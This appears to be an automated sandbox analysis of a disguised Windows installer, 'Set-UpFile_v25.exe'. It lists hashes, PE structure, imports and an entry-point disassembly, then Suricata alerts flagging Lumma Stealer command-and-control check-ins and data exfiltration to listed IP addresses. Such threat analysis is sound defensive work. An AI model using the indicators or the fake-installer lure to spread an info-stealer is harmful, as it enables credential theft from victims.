                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):0.5144643785072911
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                              • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                              • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              File name:Set-UpFile_v25.exe
                                                                                                                                                              File size:75'060'322 bytes
                                                                                                                                                              MD5:2f33775c502e7b2d60b9bfe944b46863
                                                                                                                                                              SHA1:57d023419ecbe81d27368757fea4366de68891ea
                                                                                                                                                              SHA256:fce2d6446420934b428053edf66b7cc5838717fbf67911c11145424ebd0a045b
                                                                                                                                                              SHA512:afd577d935d151cff6eae652be7f362bc29e89df5a2166bf9cf56f6acbbc57626abe3a970b765b4bb1e079e5bf8a41e4cb440f2a23913d43ca5631c5cfb54acf
                                                                                                                                                              SSDEEP:24576:otdAm9DUi/CR3wCkCiRgoG7hBaHkbEXaeG/jFt5xTx9CAaui1CgqU8Expi0Sy4YF:YqTytRFkDek1XFaumfq16E0nZpd
                                                                                                                                                              TLSH:1DF7C1297600A1A1B7D2BFFD490393CA9AA6E108B33134FF155E270ADD3B5D8433765A
                                                                                                                                                              File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:2d2e3797b32b2b99

                                                                                                                                                              Static PE Info

                                                                                                                                                              General

                                                                                                                                                              Entrypoint:0x50156c
                                                                                                                                                              Entrypoint Section:.itext
                                                                                                                                                              Digitally signed:true
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:5
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:5
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                                                                              Authenticode Signature

                                                                                                                                                              Signature Valid:false
                                                                                                                                                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                              Not Before, Not After
                                                                                                                                                              • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                              Subject Chain
                                                                                                                                                              • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                              Version:3
                                                                                                                                                              Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                              Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                              Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                              Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                              Entrypoint Preview

                                                                                                                                                              Instruction
                                                                                                                                                              push ebp
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              add esp, FFFFFFF0h
                                                                                                                                                              push ebx
                                                                                                                                                              push esi
                                                                                                                                                              push edi
                                                                                                                                                              mov eax, 004FEBF4h
                                                                                                                                                              call 00007F218C420B12h
                                                                                                                                                              push FFFFFFECh
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                              push ebx
                                                                                                                                                              call 00007F218C4219BDh
                                                                                                                                                              and eax, FFFFFF7Fh
                                                                                                                                                              push eax
                                                                                                                                                              push FFFFFFECh
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              push ebx
                                                                                                                                                              call 00007F218C421C12h
                                                                                                                                                              xor eax, eax
                                                                                                                                                              push ebp
                                                                                                                                                              push 005015E7h
                                                                                                                                                              push dword ptr fs:[eax]
                                                                                                                                                              mov dword ptr fs:[eax], esp
                                                                                                                                                              push 00000001h
                                                                                                                                                              call 00007F218C42135Dh
                                                                                                                                                              call 00007F218C5164BCh
                                                                                                                                                              mov eax, dword ptr [004FE82Ch]
                                                                                                                                                              push eax
                                                                                                                                                              push 004FE890h
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              call 00007F218C493F51h
                                                                                                                                                              call 00007F218C516510h
                                                                                                                                                              xor eax, eax
                                                                                                                                                              pop edx
                                                                                                                                                              pop ecx
                                                                                                                                                              pop ecx
                                                                                                                                                              mov dword ptr fs:[eax], edx
                                                                                                                                                              jmp 00007F218C51915Bh
                                                                                                                                                              jmp 00007F218C41C239h
                                                                                                                                                              call 00007F218C51628Ch
                                                                                                                                                              mov eax, 00000001h
                                                                                                                                                              call 00007F218C41CCFAh
                                                                                                                                                              call 00007F218C41C67Dh
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              mov edx, 0050177Ch
                                                                                                                                                              call 00007F218C493A5Ch
                                                                                                                                                              push 00000005h
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              mov eax, dword ptr [eax+00000170h]
                                                                                                                                                              push eax
                                                                                                                                                              call 00007F218C421BD3h
                                                                                                                                                              mov eax, dword ptr [00504E38h]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              mov edx, dword ptr [004D9740h]

                                                                                                                                                              Data Directories

                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x10d0000x3840.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1130000x6d600.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x4791aa20x39c0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1120000x18.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10da800x88c.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                              Sections

                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000xfe0840xfe200ef1b62ba5d0b70ba5c2cfd64e2c11839False0.4838360412567634data6.484873057389425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .itext0x1000000x17880x1800030d751d7e20e11f863bdb27a950c708False0.5203450520833334data5.94899155660316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0x1020000x30680x32002f90c6f68c18651f5b580d5ad2b852e9False0.421796875data4.334644118113417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .bss0x1060000x61940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .idata0x10d0000x38400x3a00e31e730fc86b9dac8932bd3f92752751False0.31041217672413796data5.202469592139362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .tls0x1110000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rdata0x1120000x180x200d6264f4705ad03600aa29f24c89eb799False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rsrc0x1130000x6d6000x6d6001b67589f903edb38a6f0dd56d6b97683False0.5853459821428572data7.319003457622621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                              Resources

                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_CURSOR0x113c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                              RT_CURSOR0x113d780x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                              RT_CURSOR0x113eac0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                              RT_CURSOR0x113fe00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                              RT_CURSOR0x1141140x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                              RT_CURSOR0x1142480x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                              RT_CURSOR0x11437c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                              RT_BITMAP0x1144b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                              RT_BITMAP0x1149980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                              RT_ICON0x114a800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                              RT_ICON0x114ba80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                              RT_ICON0x1151100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                              RT_ICON0x1153f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                              RT_STRING0x115ca00xecdata0.6059322033898306
                                                                                                                                                              RT_STRING0x115d8c0x250data0.47466216216216217
                                                                                                                                                              RT_STRING0x115fdc0x28cdata0.4647239263803681
                                                                                                                                                              RT_STRING0x1162680x3e4data0.4347389558232932
                                                                                                                                                              RT_STRING0x11664c0x9cdata0.717948717948718
                                                                                                                                                              RT_STRING0x1166e80xe8data0.6293103448275862
                                                                                                                                                              RT_STRING0x1167d00x468data0.3820921985815603
                                                                                                                                                              RT_STRING0x116c380x38cdata0.3898678414096916
                                                                                                                                                              RT_STRING0x116fc40x3dcdata0.39271255060728744
                                                                                                                                                              RT_STRING0x1173a00x360data0.37037037037037035
                                                                                                                                                              RT_STRING0x1177000x40cdata0.3783783783783784
                                                                                                                                                              RT_STRING0x117b0c0x108data0.5113636363636364
                                                                                                                                                              RT_STRING0x117c140xccdata0.6029411764705882
                                                                                                                                                              RT_STRING0x117ce00x234data0.5070921985815603
                                                                                                                                                              RT_STRING0x117f140x3c8data0.3181818181818182
                                                                                                                                                              RT_STRING0x1182dc0x32cdata0.43349753694581283
                                                                                                                                                              RT_STRING0x1186080x2a0data0.41964285714285715
                                                                                                                                                              RT_RCDATA0x1188a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                              RT_RCDATA0x120b900x10data1.5
                                                                                                                                                              RT_RCDATA0x120ba00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                              RT_RCDATA0x1223a00x6b0data0.6466121495327103
                                                                                                                                                              RT_RCDATA0x122a500x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                              RT_RCDATA0x1285600x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                              RT_RCDATA0x1286880x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                              RT_RCDATA0x128a2c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                              RT_RCDATA0x128d4c0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                              RT_RCDATA0x12904c0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                              RT_RCDATA0x1296280x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                              RT_RCDATA0x129a8c0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                              RT_GROUP_CURSOR0x12bb200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                              RT_GROUP_CURSOR0x12bb340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                              RT_GROUP_CURSOR0x12bb480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                              RT_GROUP_CURSOR0x12bb5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                              RT_GROUP_CURSOR0x12bb700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                              RT_GROUP_CURSOR0x12bb840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                              RT_GROUP_CURSOR0x12bb980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                              RT_GROUP_ICON0x12bbac0x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                              RT_VERSION0x12bbec0x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                              RT_MANIFEST0x12bd480x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                              Imports

                                                                                                                                                              DLLImport
                                                                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                              advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                              user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                              user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                              msimg32.dllAlphaBlend
                                                                                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                              version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                              mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                              kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                              advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                              comctl32.dllInitCommonControls
                                                                                                                                                              kernel32.dllSleep
                                                                                                                                                              oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                              comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                              shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                              shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                              comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                              ole32.dllCoDisconnectObject
                                                                                                                                                              advapi32.dllAdjustTokenPrivileges
                                                                                                                                                              oleaut32.dllSysFreeString

                                                                                                                                                              Possible Origin

                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States

                                                                                                                                                              Network Behavior

                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2025-01-07T14:37:11.659198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:12.141741+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:12.141741+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:12.609952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:13.061485+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449749104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:13.061485+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:13.913865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:15.152429+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:16.395868+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:22.773652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:24.415568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:24.859758+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449755104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:26.047768+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:26.052786+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449756104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:28.145395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:28.640242+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449757104.21.25.52443TCP
                                                                                                                                                              2025-01-07T14:37:29.414835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758185.161.251.21443TCP

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 7, 2025 14:37:11.168333054 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.168380022 CET44349748104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:11.168493032 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.171468973 CET49748443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:11.171484947 CET44349748104.21.25.52192.168.2.4
